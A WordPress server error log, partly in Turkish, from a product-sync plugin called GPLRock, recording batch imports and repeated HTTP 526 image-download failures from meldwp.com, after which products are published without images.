Skip: 0, Toplam: 100 [08-Mar-2026 22:31:30 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:31:30 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2500, Total: 400/9737 [08-Mar-2026 22:31:31 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:31:31 UTC] GPLRock: Image download failed for product contact-form-7-email-add-on-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:33 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:31:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-email-add-on-pro-13914.webp for product contact-form-7-email-add-on-pro after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:34 UTC] GPLRock: Image download failed for product contact-form-7-email-add-on-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:36 UTC] GPLRock: Image download failed for product contact-form-7-email-add-on-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-email-add-on-pro-13914.webp for product contact-form-7-email-add-on-pro after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:38 UTC] GPLRock WARNING: Image download failed for product contact-form-7-email-add-on-pro. URL: https://meldwp.com/wp-content/uploads/contact-form-7-email-add-on-pro-13914.webp [08-Mar-2026 22:31:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-email-add-on-pro [08-Mar-2026 22:31:39 UTC] GPLRock: Image download failed for product appointment-buddy-online-appointment-booking-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:41 UTC] GPLRock: Image download failed for product appointment-buddy-online-appointment-booking-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appointment-buddy---online-appointment-booking-wp-plugin-26556.webp for product appointment-buddy-online-appointment-booking-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:44 UTC] GPLRock: Image download failed for product appointment-buddy-online-appointment-booking-wp-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:46 UTC] GPLRock: Image download failed for product appointment-buddy-online-appointment-booking-wp-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appointment-buddy---online-appointment-booking-wp-plugin-26556.webp for product appointment-buddy-online-appointment-booking-wp-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:48 UTC] GPLRock WARNING: Image download failed for product appointment-buddy-online-appointment-booking-wp-plugin. URL: https://meldwp.com/wp-content/uploads/appointment-buddy---online-appointment-booking-wp-plugin-26556.webp [08-Mar-2026 22:31:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appointment-buddy-online-appointment-booking-wp-plugin [08-Mar-2026 22:31:48 UTC] GPLRock: Image download failed for product bookly-multisite-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:50 UTC] GPLRock: Image download failed for product bookly-multisite-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-multisite-add-on-32983.webp for product bookly-multisite-add-on after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:53 UTC] GPLRock: Image download failed for product bookly-multisite-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:55 UTC] GPLRock: Image download failed for product bookly-multisite-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:31:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-multisite-add-on-32983.webp for product bookly-multisite-add-on after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:31:57 UTC] GPLRock WARNING: Image download failed for product bookly-multisite-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-multisite-add-on-32983.webp [08-Mar-2026 22:31:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-multisite-add-on [08-Mar-2026 22:31:58 UTC] GPLRock: Image download failed for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:00 UTC] GPLRock: Image download failed for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer-17672.webp for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:02 UTC] GPLRock: Image download failed for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:04 UTC] GPLRock: Image download failed for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer-17672.webp for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:06 UTC] GPLRock WARNING: Image download failed for product 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer-17672.webp [08-Mar-2026 22:32:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 3d-carousel-addon-for-wpbakery-page-builder-formerly-visual-composer [08-Mar-2026 22:32:07 UTC] GPLRock: Image download failed for product button-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:09 UTC] GPLRock: Image download failed for product button-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/button-menu-27530.webp for product button-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:11 UTC] GPLRock: Image download failed for product button-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:13 UTC] GPLRock: Image download failed for product button-menu (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/button-menu-27530.webp for product button-menu after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:15 UTC] GPLRock WARNING: Image download failed for product button-menu. URL: https://meldwp.com/wp-content/uploads/button-menu-27530.webp [08-Mar-2026 22:32:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: button-menu [08-Mar-2026 22:32:16 UTC] GPLRock: Image download failed for product active-ecommerce-pos-manager-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:19 UTC] GPLRock: Image download failed for product active-ecommerce-pos-manager-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/active-ecommerce-pos-manager-add-on-17134.webp for product active-ecommerce-pos-manager-add-on after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:21 UTC] GPLRock: Image download failed for product active-ecommerce-pos-manager-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:23 UTC] GPLRock: Image download failed for product active-ecommerce-pos-manager-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/active-ecommerce-pos-manager-add-on-17134.webp for product active-ecommerce-pos-manager-add-on after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:25 UTC] GPLRock WARNING: Image download failed for product active-ecommerce-pos-manager-add-on. URL: https://meldwp.com/wp-content/uploads/active-ecommerce-pos-manager-add-on-17134.webp [08-Mar-2026 22:32:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: active-ecommerce-pos-manager-add-on [08-Mar-2026 22:32:25 UTC] GPLRock: Image download failed for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:27 UTC] GPLRock: Image download failed for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elemform7-pro---advanced-elementor-widget-for-contact-form-7-3894.webp for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:30 UTC] GPLRock: Image download failed for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:32 UTC] GPLRock: Image download failed for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elemform7-pro---advanced-elementor-widget-for-contact-form-7-3894.webp for product elemform7-pro-advanced-elementor-widget-for-contact-form-7 after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:34 UTC] GPLRock WARNING: Image download failed for product elemform7-pro-advanced-elementor-widget-for-contact-form-7. URL: https://meldwp.com/wp-content/uploads/elemform7-pro---advanced-elementor-widget-for-contact-form-7-3894.webp [08-Mar-2026 22:32:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elemform7-pro-advanced-elementor-widget-for-contact-form-7 [08-Mar-2026 22:32:34 UTC] GPLRock: Image download failed for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:36 UTC] GPLRock: Image download failed for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method-15896.webp for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:38 UTC] GPLRock: Image download failed for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:40 UTC] GPLRock: Image download failed for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method-15896.webp for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:42 UTC] GPLRock WARNING: Image download failed for product woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method. URL: https://meldwp.com/wp-content/uploads/woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method-15896.webp [08-Mar-2026 22:32:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-payment-checkout-plugin-offline-credit-card-checkout-method [08-Mar-2026 22:32:43 UTC] GPLRock: Image download failed for product woocommerce-learning-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:45 UTC] GPLRock: Image download failed for product woocommerce-learning-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-learning-management-system-21109.webp for product woocommerce-learning-management-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:47 UTC] GPLRock: Image download failed for product woocommerce-learning-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:49 UTC] GPLRock: Image download failed for product woocommerce-learning-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-learning-management-system-21109.webp for product woocommerce-learning-management-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:51 UTC] GPLRock WARNING: Image download failed for product woocommerce-learning-management-system. URL: https://meldwp.com/wp-content/uploads/woocommerce-learning-management-system-21109.webp [08-Mar-2026 22:32:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-learning-management-system [08-Mar-2026 22:32:52 UTC] GPLRock: Image download failed for product wordpress-multilingual-multisite (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:54 UTC] GPLRock: Image download failed for product wordpress-multilingual-multisite (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-multilingual-multisite-22121.webp for product wordpress-multilingual-multisite after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:32:56 UTC] GPLRock: Image download failed for product wordpress-multilingual-multisite (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:32:58 UTC] GPLRock: Image download failed for product wordpress-multilingual-multisite (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:33:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-multilingual-multisite-22121.webp for product wordpress-multilingual-multisite after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:33:00 UTC] GPLRock WARNING: Image download failed for product wordpress-multilingual-multisite. URL: https://meldwp.com/wp-content/uploads/wordpress-multilingual-multisite-22121.webp [08-Mar-2026 22:33:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-multilingual-multisite [08-Mar-2026 22:33:01 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2400, Total: 300/9737 [08-Mar-2026 22:33:02 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:33:04 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:33:05 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2500, Total: 300/9737 [08-Mar-2026 22:33:05 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:33:06 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 22:40:54 UTC] GPLRock: Image downloaded successfully for product jcountdown-mega-package (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6b910c8.webp [08-Mar-2026 22:40:55 UTC] GPLRock: Using pre-downloaded image for product jcountdown-mega-package: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6b910c8.webp [08-Mar-2026 22:40:55 UTC] GPLRock: Ghost product published with image - Product ID: jcountdown-mega-package [08-Mar-2026 22:40:55 UTC] GPLRock: Image download failed for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:40:57 UTC] GPLRock: Image download failed for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:40:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-news-and-scrolling-widgets-pro---wordpress-news-plugin-16061.webp for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:01 UTC] GPLRock: Image download failed for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:03 UTC] GPLRock: Image download failed for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-news-and-scrolling-widgets-pro---wordpress-news-plugin-16061.webp for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:05 UTC] GPLRock WARNING: Image download failed for product wp-news-and-scrolling-widgets-pro-wordpress-news-plugin. URL: https://meldwp.com/wp-content/uploads/wp-news-and-scrolling-widgets-pro---wordpress-news-plugin-16061.webp [08-Mar-2026 22:41:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-news-and-scrolling-widgets-pro-wordpress-news-plugin [08-Mar-2026 22:41:05 UTC] GPLRock: Image downloaded successfully for product bookpro-appointment-booking-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5615b7fa.webp [08-Mar-2026 22:41:05 UTC] GPLRock: Using pre-downloaded image for product bookpro-appointment-booking-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5615b7fa.webp [08-Mar-2026 22:41:05 UTC] GPLRock: Ghost product published with image - Product ID: bookpro-appointment-booking-wordpress-plugin [08-Mar-2026 22:41:05 UTC] GPLRock: Image download failed for product weather-forecast-wordpress-weather-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:07 UTC] GPLRock: Image download failed for product weather-forecast-wordpress-weather-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weather-forecast---wordpress-weather-plugin-14800.webp for product weather-forecast-wordpress-weather-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:10 UTC] GPLRock: Image download failed for product weather-forecast-wordpress-weather-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:12 UTC] GPLRock: Image download failed for product weather-forecast-wordpress-weather-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/weather-forecast---wordpress-weather-plugin-14800.webp for product weather-forecast-wordpress-weather-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:14 UTC] GPLRock WARNING: Image download failed for product weather-forecast-wordpress-weather-plugin. URL: https://meldwp.com/wp-content/uploads/weather-forecast---wordpress-weather-plugin-14800.webp [08-Mar-2026 22:41:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: weather-forecast-wordpress-weather-plugin [08-Mar-2026 22:41:14 UTC] GPLRock: Image download failed for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:17 UTC] GPLRock: Image download failed for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wo-25117.webp for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:19 UTC] GPLRock: Image download failed for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:21 UTC] GPLRock: Image download failed for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wo-25117.webp for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:23 UTC] GPLRock WARNING: Image download failed for product pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wo-25117.webp [08-Mar-2026 22:41:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pinterestomatic-automatic-post-generator-and-pinterest-auto-poster-plugin-for-wordpress [08-Mar-2026 22:41:23 UTC] GPLRock: Image download failed for product marketplace-multi-merchant-badge-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:25 UTC] GPLRock: Image download failed for product marketplace-multi-merchant-badge-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplace-multi-merchant-badge-plugin-for-woocommerce-2604.webp for product marketplace-multi-merchant-badge-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:28 UTC] GPLRock: Image download failed for product marketplace-multi-merchant-badge-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:30 UTC] GPLRock: Image download failed for product marketplace-multi-merchant-badge-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplace-multi-merchant-badge-plugin-for-woocommerce-2604.webp for product marketplace-multi-merchant-badge-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:32 UTC] GPLRock WARNING: Image download failed for product marketplace-multi-merchant-badge-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/marketplace-multi-merchant-badge-plugin-for-woocommerce-2604.webp [08-Mar-2026 22:41:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marketplace-multi-merchant-badge-plugin-for-woocommerce [08-Mar-2026 22:41:33 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:35 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-product-feed-plugin---drm-dsa--more-7872.webp for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:38 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:40 UTC] GPLRock: Image download failed for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-product-feed-plugin---drm-dsa--more-7872.webp for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:42 UTC] GPLRock WARNING: Image download failed for product woocommerce-google-merchant-product-feed-plugin-drm-dsa-more. URL: https://meldwp.com/wp-content/uploads/woocommerce-google-merchant-product-feed-plugin---drm-dsa--more-7872.webp [08-Mar-2026 22:41:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-google-merchant-product-feed-plugin-drm-dsa-more [08-Mar-2026 22:41:42 UTC] GPLRock: Image download failed for product lawyer-directory (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:44 UTC] GPLRock: Image download failed for product lawyer-directory (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawyer-directory-22789.webp for product lawyer-directory after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:46 UTC] GPLRock: Image download failed for product lawyer-directory (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:48 UTC] GPLRock: Image download failed for product lawyer-directory (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawyer-directory-22789.webp for product lawyer-directory after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:50 UTC] GPLRock WARNING: Image download failed for product lawyer-directory. URL: https://meldwp.com/wp-content/uploads/lawyer-directory-22789.webp [08-Mar-2026 22:41:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lawyer-directory [08-Mar-2026 22:41:50 UTC] GPLRock: Image download failed for product w8-contact-form-wordpress-contact-form-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:53 UTC] GPLRock: Image download failed for product w8-contact-form-wordpress-contact-form-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/w8-contact-form---wordpress-contact-form-plugin-15718.webp for product w8-contact-form-wordpress-contact-form-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:55 UTC] GPLRock: Image download failed for product w8-contact-form-wordpress-contact-form-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:57 UTC] GPLRock: Image download failed for product w8-contact-form-wordpress-contact-form-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:41:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/w8-contact-form---wordpress-contact-form-plugin-15718.webp for product w8-contact-form-wordpress-contact-form-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:41:59 UTC] GPLRock WARNING: Image download failed for product w8-contact-form-wordpress-contact-form-plugin. URL: https://meldwp.com/wp-content/uploads/w8-contact-form---wordpress-contact-form-plugin-15718.webp [08-Mar-2026 22:42:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: w8-contact-form-wordpress-contact-form-plugin [08-Mar-2026 22:42:01 UTC] GPLRock: Image downloaded successfully for product quick-quiz-laravel-quiz-and-exam-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f12f5f17.webp [08-Mar-2026 22:42:01 UTC] GPLRock: Using pre-downloaded image for product quick-quiz-laravel-quiz-and-exam-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f12f5f17.webp [08-Mar-2026 22:42:01 UTC] GPLRock: Ghost product published with image - Product ID: quick-quiz-laravel-quiz-and-exam-system [08-Mar-2026 22:42:01 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2600, Total: 300/9737 [08-Mar-2026 22:42:02 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:42:04 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:42:06 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2700, Total: 400/9737 [08-Mar-2026 22:42:07 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:42:08 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:42:08 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 22:42:08 UTC] GPLRock API Sync: Batch başlıyor - Offset: 2800, Total: 500/9737 [08-Mar-2026 22:42:09 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 22:42:12 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:44:40 UTC] GPLRock: Image download failed for product ultraviolette-design-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:42 UTC] GPLRock: Image download failed for product ultraviolette-design-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultraviolette---design-portfolio-wordpress-theme-19123.webp for product ultraviolette-design-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:44:44 UTC] GPLRock: 